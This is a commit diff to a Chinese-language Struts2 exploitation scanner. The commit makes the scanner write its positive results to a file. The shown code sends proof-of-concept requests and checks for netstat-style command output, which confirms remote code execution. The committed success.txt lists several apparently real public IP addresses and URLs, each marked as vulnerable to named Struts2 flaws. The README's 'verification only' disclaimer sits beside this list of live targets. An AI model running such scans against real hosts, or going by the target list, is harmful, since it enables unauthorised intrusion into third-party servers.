write file

t1me0vt · Dec 15, 2017 · 1bea356 · 1bea356
1 parent 25b5b3d
commit 1bea356
Show file tree

Hide file tree

Showing 3 changed files with 24 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -59,5 +59,7 @@ ST2-053
 [+]针对某些超时的情况,注释掉 httplib.HTTPConnection._http_vsn = 10 和httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0'这两行再测试一遍,因为有的可能不支持HTTP/1.0的协议。
 
 [+]增加linux和win的可执行文件,windows需要.NET环境。
+
+[+]增加写入文件功能,针对有漏洞的struts版本号会自动写入success.txt文件。
 # 特别说明
 此工具仅限于漏洞验证，如若使用者引起相关的法律责任请自负，开发者不承担连带责任。
diff --git a/struts-scan.py b/struts-scan.py
@@ -67,12 +67,16 @@ def __init__(self, url):
     def check(self, pocname, vulnstr):
         if vulnstr.find("Active Internet connections") is not -1:
             cprint("目标存在" + pocname + "漏洞..[Linux]", "red")
+            filecontent.writelines(pocname+" success!!!"+"\n")
         elif vulnstr.find("Active Connections") is not -1:
             cprint("目标存在" + pocname + "漏洞..[Windows]", "red")
+            filecontent.writelines(pocname+" success!!!"+"\n")
         elif vulnstr.find("活动连接") is not -1:
             cprint("目标存在" + pocname + "漏洞..[Windows]", "red")
+            filecontent.writelines(pocname+" success!!!"+"\n")
         elif vulnstr.find("LISTEN") is not -1:
             cprint("目标存在" + pocname + "漏洞..[未知OS]", "red")
+            filecontent.writelines(pocname+" success!!!"+"\n")
         else:
             cprint("目标不存在" + pocname +"漏洞..", "green")
 
@@ -86,6 +90,8 @@ def scan(self):
                                         Code by Lucifer.
             ''', 'cyan')
         cprint("-------检测struts2漏洞--------\n目标url:"+self.url, "cyan")
+        filecontent.writelines("检测struts2漏洞: "+self.url)
+        filecontent.write("\n")
         try:
             req = requests.post(self.url, headers=headers, data=self.poc['ST2-005'], timeout=6, verify=False)
             self.check("struts2-005", req.text)
@@ -184,6 +190,7 @@ def scan(self):
             req2 = requests.get(self.url+"?class[%27classLoader%27][%27resources%27]=1", headers=headers, timeout=6, verify=False)
             if req1.status_code == 200 and req2.status_code == 404:
                 cprint("目标存在struts2-020漏洞..(只提供检测)", "red")
+                filecontent.writelines("struts2-020 success!!!\n")
             else:
                 cprint("目标不存在struts2-020漏洞..", "green")
         except Exception as e:
@@ -194,6 +201,7 @@ def scan(self):
             req = requests.post(self.url, data=self.poc['ST2-052'], headers=headers_052, timeout=6, verify=False)
             if req.status_code == 500 and r"java.security.Provider$Service" in req.text:
                 cprint("目标存在struts2-052漏洞..(参考metasploit中的struts2_rest_xstream模块)", "red")
+                filecontent.writelines("struts2-052 success!!!\n")
             else:
                 cprint("目标不存在struts2-052漏洞..", "green")
         except Exception as e:
@@ -433,6 +441,7 @@ def inShell(self, pocname):
                     sys.exit(1)
 
 if __name__ == "__main__":
+    filecontent = open("success.txt", "a+")
     try:
         if sys.argv[1] == "-f":
             with open(sys.argv[2]) as f:

diff --git a/success.txt b/success.txt
@@ -0,0 +1,13 @@
+检测struts2漏洞: http://84.201.197.71/search-execute
+struts2-045 success!!!
+struts2-046 success!!!
+检测struts2漏洞: https://177.1.212.236/loginaction
+struts2-019 success!!!
+struts2-045 success!!!
+struts2-046 success!!!
+检测struts2漏洞: http://123.207.56.37/product/list
+struts2-016 success!!!
+struts2-devmode success!!!
+检测struts2漏洞: http://122.194.119.66/struts/login/loginAction_getValidateCode.action
+struts2-016 success!!!
+struts2-019 success!!!